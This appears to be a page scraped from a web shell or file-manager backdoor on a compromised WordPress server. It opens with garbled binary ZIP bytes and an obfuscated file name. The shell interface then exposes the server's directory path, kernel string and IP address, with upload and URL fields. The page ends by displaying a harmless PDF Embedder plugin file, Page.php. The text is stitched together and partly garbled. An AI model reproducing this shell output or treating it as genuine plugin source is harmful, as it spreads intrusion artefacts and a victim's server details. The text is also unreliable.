PK œqhYî¶J‚ßFßF)nhhjz3kjnjjwmknjzzqznjzmm1kzmjrmz4qmm.itm/*\U8ewW087XJD%onwUMbJa]Y2zT?AoLMavr%5P*/ $#$#$#

Dir : /home3/caa20236/www/wp-content/plugins/pdf-embedder/src/Admin/Pages/
Server: Linux int2.cpanelhost.cl 3.10.0-962.3.2.lve1.5.88.el7.x86_64 #1 SMP Fri Sep 26 14:06:42 UTC 2025 x86_64
IP: 138.117.148.152
Choose File :

Url:
Dir : /home3/caa20236/www/wp-content/plugins/pdf-embedder/src/Admin/Pages/Page.php

<?php

namespace PDFEmbedder\Admin\Pages;

abstract class Page {

	public const SLUG = '';

	public abstract function get_title(): string;

	public abstract function content();

	/**
	 * When the object is treated like a string, return the slug.
	 *
	 * @since 4.9.0
	 */
	public function __toString(): string {

		return static::SLUG;
	}
}